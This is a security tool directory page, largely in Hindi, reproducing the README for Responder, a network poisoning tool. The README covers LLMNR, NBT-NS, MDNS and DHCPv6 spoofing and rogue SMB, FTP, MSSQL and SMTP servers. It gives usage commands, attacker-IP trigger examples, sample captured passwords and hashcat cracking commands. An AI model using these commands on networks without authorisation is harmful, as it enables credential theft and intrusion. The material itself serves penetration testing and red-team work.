Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Responder — Responder एक LLMNR, NBT-NS और MDNS पॉइज़नर है, जिसमें NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP और Basic HTTP प्रमाणीकरण का समर्थन करने वाला अंतर्निहित HTTP/SMB/MSSQL/FTP/LDAP रॉग प्रमाणीकरण सर्वर शामिल है। | Kitploit
उपकरण/GitHubGitHub/lgandx/responder
पासवर्ड क्रैकिंगटोहीपासवर्ड हमलेDNS और सबडोमेन गणनाशोषणपार्श्व आंदोलनजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणDNS फज़िंगरेड टीमिंग
6.5k8671233 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
DNS विश्लेषण
पार्श्व आंदोलन में शीर्ष #7
पासवर्ड हमले में शीर्ष #8
पासवर्ड क्रैकिंग में शीर्ष #6
GitHublgandx/responder

Responder

Responder एक LLMNR, NBT-NS और MDNS पॉइज़नर है, जिसमें NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP और Basic HTTP प्रमाणीकरण का समर्थन करने वाला अंतर्निहित HTTP/SMB/MSSQL/FTP/LDAP रॉग प्रमाणीकरण सर्वर शामिल है।

रिपॉजिटरी देखें

Responder

Python Version License

Responder एक LLMNR, NBT-NS, और MDNS पॉइज़नर है जिसमें HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS, और अधिक के लिए बिल्ट-इन रॉग ऑथेंटिकेशन सर्वर हैं। यह NTLMv1/NTLMv2/LMv2, एक्सटेंडेड सिक्योरिटी NTLMSSP, और 15+ प्रोटोकॉल में विभिन्न प्रमाणीकरण विधियों का समर्थन करता है।


Table of Contents

  • अवलोकन
  • नया क्या है
  • स्थापना
  • त्वरित आरंभ
  • नेटवर्क पॉइज़निंग
  • रॉग सर्वर
  • कॉन्फ़िगरेशन
  • macOS
  • समस्या निवारण

अवलोकन

Responder LLMNR, NBT-NS, और MDNS नाम समाधान अनुरोधों का जवाब देकर क्रेडेंशियल्स कैप्चर करता है। जब कोई क्लाइंट किसी अस्तित्वहीन होस्टनाम को हल करने का प्रयास करता है, तो Responder उत्तर देता है, क्लाइंट को हमलावर की मशीन पर निर्देशित करता है जहाँ कई रॉग ऑथेंटिकेशन सर्वर क्रेडेंशियल्स कैप्चर करते हैं। DHCP, DHCPv6 रॉग सर्वर भी शामिल हैं और इन्हें अलग से सक्षम किया जा सकता है।

कैप्चर किया गया डेटा:

  • NetNTLMv1/v2 हैश - हैशकैट/जॉन से क्रैक करने योग्य
  • Kerberos AS-REQ हैश - ऑफलाइन क्रैकिंग (hashcat -m 7500)
  • स्पष्ट पाठ क्रेडेंशियल्स - HTTP बेसिक, FTP, SMTP, IMAP, LDAP, SQL, आदि।
  • चैलेंज-रिस्पांस - CRAM-MD5, DIGEST-MD5

नया क्या है

इस संस्करण में शामिल हैं:

DHCPv6 और DNS संवर्द्धन

  • ✅ DHCPv6 INFORMATION-REQUEST - पूर्ण Windows 10/11 संगतता
  • ✅ डोमेन फ़िल्टरिंग - विशिष्ट डोमेन को लक्ष्य करें (DHCPv6 और DNS)
  • ✅ राउटर विज्ञापन - वैकल्पिक IPv6 नेटवर्क पॉइज़निंग

ईमेल सर्वर अपग्रेड

  • ✅ SMTP STARTTLS - आधुनिक ईमेल क्लाइंट से कैप्चर करें
  • ✅ IMAP STARTTLS - TLS अपग्रेड के साथ पोर्ट 143
  • ✅ IMAPS - पोर्ट 993 पर नेटिव SSL
  • ✅ उन्नत POP3 - बेहतर संगतता

Kerberos सुधार

  • ✅ फोर्स AS-REQ - केरबेरोस प्रमाणीकरण को बाध्य करें।
  • ✅ NTLM फ़ॉलबैक का प्रयास करें - केरबेरोस प्रमाणीकरण लेने के बाद, KDC_ERR_ETYPE_NOSUPP लौटाएं

प्रोटोकॉल संवर्द्धन

  • ✅ MSSQL - SQL सर्वर प्रमाणीकरण कैप्चर
  • ✅ LDAP/LDAPS - निर्देशिका सेवा क्रेडेंशियल्स
  • ✅ RDP - रिमोट डेस्कटॉप प्रमाणीकरण
  • ✅ WinRM - विंडोज रिमोट मैनेजमेंट
  • ✅ DCERPC - विंडोज RPC प्रमाणीकरण

स्थापना

आवश्यकताएँ

  • पायथन 2.7 या पायथन 3.x
  • लिनक्स (Ubuntu, Kali, Debian अनुशंसित)
  • रूट विशेषाधिकार

सिस्टम निर्भरताएँ```bash

sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces

### Responder स्थापित करें```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt

स्थापना की पुष्टि करें```bash

sudo python3 Responder.py --help

---

## त्वरित प्रारंभ

### बुनियादी विषाक्तीकरण```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v

# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v

DHCPv6 हमला```bash

Edit Responder.conf first:

[DHCPv6 Server]

DHCPv6_Domain = corp.local

sudo python3 Responder.py -I eth0 --dhcpv6 -v

### बलपूर्वक HTTP Basic Auth```bash
sudo python3 Responder.py -I eth0 -b -v

प्रॉक्सी प्रमाणीकरण + रॉग DHCP सक्षम करें```bash

Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)

sudo python3 Responder.py -I eth0 -Pvd

## नेटवर्क विषाक्तीकरण

### LLMNR/NBT-NS/MDNS विषाक्तीकरण

**उद्देश्य:** नाम रिज़ॉल्यूशन विफलताओं का जवाब देना

**यह कैसे काम करता है:**
1. क्लाइंट अस्तित्वहीन होस्ट के लिए प्रश्न प्रसारित करता है
2. रिस्पॉन्डर उत्तर देता है: "मैं वह होस्ट हूँ"
3. क्लाइंट हमलावर से जुड़ता है
4. क्रेडेंशियल्स कैप्चर हो जाते हैं

**कॉन्फ़िगरेशन:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On

उपयोग:```bash sudo python3 Responder.py -I eth0 -v

---

### DHCPv6 सर्वर

**उद्देश्य:** क्लाइंट को IPv6 के माध्यम से हमलावर के DNS का उपयोग करने के लिए बाध्य करें

**विशेषताएं:**
- ✅ INFORMATION-REQUEST समर्थन (Windows 10/11)
- ✅ SOLICIT/REQUEST समर्थन
- ✅ डोमेन फ़िल्टरिंग (सर्जिकल लक्ष्यीकरण)
- ✅ राउटर विज्ञापन (वैकल्पिक)

**यह कैसे काम करता है:**
1. Windows DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST भेजता है
2. रिस्पॉन्डर प्रतिक्रिया देता है: DNS = हमलावर का IPv6
3. Windows IPv6 DNS को प्राथमिकता देता है
4. सभी DNS क्वेरी → हमलावर
5. DNS विषाक्तीकरण → क्रेडेंशियल कैप्चर

**कॉन्फ़िगरेशन:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local

; Send Router Advertisements
SendRA = Off

; IPv6 address to advertise
BindToIPv6 = fe80::1

उपयोग:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v

**अपेक्षित आउटपुट:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123

दुष्ट सर्वर

Responder में 17+ दुष्ट प्रमाणीकरण सर्वर शामिल हैं:

फ़ाइल और नेटवर्क सेवाएँ

SMB सर्वर (पोर्ट 445, 139)

उद्देश्य: फ़ाइल शेयरों से NetNTLM हैश कैप्चर करना

विशेषताएँ:

  • ✅ SMBv1/SMBv2/SMBv3
  • ✅ NetNTLMv1/v2 हैश कैप्चर
  • ✅ विस्तारित सुरक्षा NTLMSSP
  • ✅ सत्र हस्ताक्षर अक्षम (रिले की अनुमति देता है)

ट्रिगर:```powershell

UNC paths

\attacker-ip\share \non-existent-server\files

NET USE commands

net use \attacker-ip\share

Windows Explorer address bar

\attacker-ip\

**कैप्चर किया गया प्रारूप:**```
username::domain:challenge:response:blob

क्रैकिंग:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt

**कॉन्फ़िगरेशन:**```ini
[Responder Core]
SMB = On

FTP सर्वर (पोर्ट 21)

उद्देश्य: क्लियरटेक्स्ट FTP क्रेडेंशियल्स कैप्चर करना

विशेषताएं:

  • ✅ अनाम लॉगिन हनीपॉट
  • ✅ USER/PASS प्रमाणीकरण
  • ✅ क्लियरटेक्स्ट क्रेडेंशियल कैप्चर

ट्रिगर:```bash ftp attacker-ip

Username: anything

Password: anything

**कैप्चर प्रारूप:**```
[FTP] Cleartext: username:password

कॉन्फ़िगरेशन:```ini [Responder Core] FTP = On

---

### डेटाबेस सर्वर

#### MSSQL सर्वर (पोर्ट 1433)

**उद्देश्य:** Microsoft SQL Server प्रमाणीकरण कैप्चर करें

**विशेषताएँ:**
- ✅ SQL Server प्रमाणीकरण
- ✅ विंडोज़ प्रमाणीकरण (NTLM)
- ✅ स्पष्ट टेक्स्ट SQL क्रेडेंशियल्स
- ✅ NetNTLMv2 हैश कैप्चर

**ट्रिगर्स:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows

-- Command line
sqlcmd -S attacker-ip -U sa -P password

-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;

कैप्चर किए गए प्रारूप:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob

**विन्यास:**```ini
[Responder Core]
SQL = On

नोट्स:

  • दोनों SQL प्रमाणीकरण और Windows प्रमाणीकरण को कैप्चर करता है
  • SSMS, sqlcmd, ADO.NET कनेक्शन के साथ काम करता है
  • Windows प्रमाणीकरण के माध्यम से डोमेन क्रेडेंशियल्स कैप्चर कर सकता है

ईमेल सर्वर

SMTP सर्वर (पोर्ट 25, 587)

उद्देश्य: ईमेल क्लाइंट प्रमाणीकरण को कैप्चर करना

विशेषताएं:

  • ✅ STARTTLS समर्थन (आधुनिक क्लाइंट)
  • ✅ AUTH PLAIN (स्पष्ट पाठ)
  • ✅ AUTH LOGIN (स्पष्ट पाठ)
  • ✅ AUTH CRAM-MD5
  • ✅ AUTH DIGEST-MD5
  • ✅ AUTH NTLM (NetNTLMv2)
टूल डाउनलोड करें